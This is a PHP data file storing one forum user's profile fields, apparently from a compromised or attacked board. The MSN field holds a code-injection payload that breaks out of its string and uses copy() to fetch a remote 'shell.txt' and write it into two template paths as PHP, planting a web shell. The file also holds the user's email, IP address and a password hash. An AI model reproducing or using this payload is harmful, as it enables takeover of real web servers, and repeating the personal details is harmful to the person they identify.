<?php

$userid="152";
$password="e8f4e25bd1b03a5d39c484e2050e6e35";
$username="Ra1n0";
$useralias="Ra1n0";
$userrealname="";
$useremail="megahak@bk.ru";
$useremhide="";
$userip="82.208.121.30";
$usersig="";
$userslogan="";
$useravatar="";
$usermsn="\';>< copy(\'http://shell123.nm.ru/shell.txt\',\'templates/pb/images/ranks/users.php\'); copy(\'http://shell123.nm.ru/shell.txt\',\'templates/users.php\'); ><#";
$userposts="0";
$usericq="";
$userqq="";
$userwebavatar="";
$userrank="1";
$useryahoo="";
$useraim="";
$userlocation="";
$userjoined="1131552628";
$userhomepage="http://";
$useradmin="0";
$usermod="0";
$userban="0";
$userfriend="";
$userlastvisit="1131552678";
$userlastpost="1131552628";
$userprevvisit="1131552662";
$useranimsmilies="";
$lastaliaschange="1131552628";
$userlang="en";
$uservisits="4";
$aliaslist="";
$noavatars="";

?>